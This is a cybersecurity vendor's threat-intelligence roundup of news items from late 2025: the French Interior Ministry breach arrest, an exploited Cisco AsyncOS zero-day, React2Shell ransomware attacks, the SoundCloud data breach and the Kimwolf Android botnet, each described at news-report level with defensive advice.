Suspect arrested after French interior ministry cyber attack

French authorities have arrested a 22-year-old man in connection with a cyber attack on the French Interior Ministry, following an investigation led by the Paris prosecutor’s cybercrime unit. The arrest took place on 17 December 2025 and relates to unauthorised access to the ministry’s internal email systems and document servers.

According to the Ministry of the Interior, the suspect, born in 2003, is already known to the justice system and was convicted earlier in 2025 for similar cyber-related offences. He is being investigated for unauthorised access to a state-run automated data processing system, an offence that carries a potential sentence of up to 10 years in prison.

The breach was detected overnight between 11 and 12 December and resulted in unauthorised access to internal files, including criminal records. Interior Minister Laurent Nuñez described the incident as serious, noting that while large-scale data extraction has not been confirmed, the full extent of the compromise remains unclear.

France’s Office for Combating Cybercrime is leading the investigation, with further updates expected once police custody concludes.

Cisco warns of actively exploited AsyncOS zero-day

Cisco has warned customers about a maximum-severity zero-day vulnerability in Cisco AsyncOS that is being actively exploited in the wild. The flaw, tracked as CVE-2025-20393, affects Secure Email Gateway (SEG) and Secure Email and Web Manager (SEWM) appliances running non-standard configurations where the Spam Quarantine feature is enabled and exposed to the internet. At the time of writing, no patch is available.

Cisco Talos attributes the attacks with moderate confidence to a Chinese-linked threat actor tracked as UAT-9686. The group is abusing the flaw to execute arbitrary commands with root privileges, deploy persistent AquaShell backdoors, establish reverse SSH tunnels using AquaTunnel and Chisel, and remove forensic evidence with a log-clearing tool named AquaPurge. The campaign has been active since at least late November 2025.

Cisco is urging administrators to restrict internet exposure, tighten access controls, monitor logs closely, and contact TAC to assess potential compromise. Rebuilding affected appliances may be required to fully remove persistence.

Ransomware gang exploits React2Shell flaw within seconds

A ransomware group has been observed exploiting the critical React2Shell vulnerability (CVE-2025-55182) to gain initial access to corporate networks and deploy file-encrypting malware in under a minute. React2Shell is an insecure deserialisation flaw in the React Server Components Flight protocol, used by React and Next.js, which allows unauthenticated remote code execution on vulnerable servers.

Researchers at S-RM confirmed that the flaw was used on 5 December to deliver the Weaxor ransomware strain. Shortly after exploitation, attackers launched an obfuscated PowerShell command to deploy a Cobalt Strike beacon, disabled Windows Defender real-time protection, and executed the ransomware payload. The entire sequence occurred in less than 60 seconds.

Weaxor, believed to be a rebrand of the Mallox operation, focuses on opportunistic attacks against public-facing systems and demands relatively low ransoms. S-RM warns that patching alone is insufficient and urges organisations to review logs and EDR telemetry for signs of exploitation.

SoundCloud confirms major data breach affecting 28 million users

SoundCloud has confirmed a cyberattack that exposed data from around 28 million user accounts, roughly 20% of its global user base. The breach was detected after unauthorised activity was identified within an internal service dashboard. While no passwords or financial information were compromised, attackers accessed user email addresses combined with publicly visible profile data, raising concerns over targeted phishing campaigns.

The attack has been linked to ShinyHunters, a well-known data extortion group previously associated with other high-profile breaches. SoundCloud said the intrusion affected a secondary internal system rather than its core platform, allowing attackers to bypass more robust protections.

In response, SoundCloud implemented emergency security measures, which triggered temporary service disruptions and VPN access issues in several countries. The company has since strengthened monitoring and access controls and urged users to change passwords and enable two-factor authentication.

The incident highlights the growing focus on large-scale data theft as a precursor to social engineering attacks.

Kimwolf botnet harnesses 1.8 million Android devices

Researchers at QiAnXin XLab have uncovered a massive new DDoS botnet dubbed Kimwolf, which has compromised an estimated 1.8 million Android-based TVs, set-top boxes, and tablets worldwide. Active since at least October 2025, the botnet is capable of launching large-scale DDoS attacks alongside proxy forwarding, reverse shell access, and file management.

Between 19 and 22 November, Kimwolf issued an estimated 1.7 billion attack commands, briefly propelling one of its command-and-control domains to the top of Cloudflare’s most queried domains list. Infections are concentrated in countries including Brazil, India, the US, South Africa, and the Philippines, with smart TV boxes identified as the primary targets.

XLab believes Kimwolf is linked to the notorious AISURU botnet, with shared infrastructure and code suggesting both belong to the same threat group. Recent variants have adopted Ethereum Name Service-based techniques to evade takedowns, highlighting the growing resilience and scale of modern IoT-focused botnets.

If you are worried about any of the threats outlined in this bulletin or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager, or alternatively Get in touch to find out how you can protect your organisation. 

The Threat Intel Roundup was prepared by Integrity360 summarising threat news as we observe it, current at the date of publishing. It should not be considered to be legal, consulting or any other professional advice. Any recommendations should be considered in the context of your own organisation. Integrity360 does not take any political stance in the information that we share. Moreover, the opinions expressed may not necessarily be the views of Integrity360.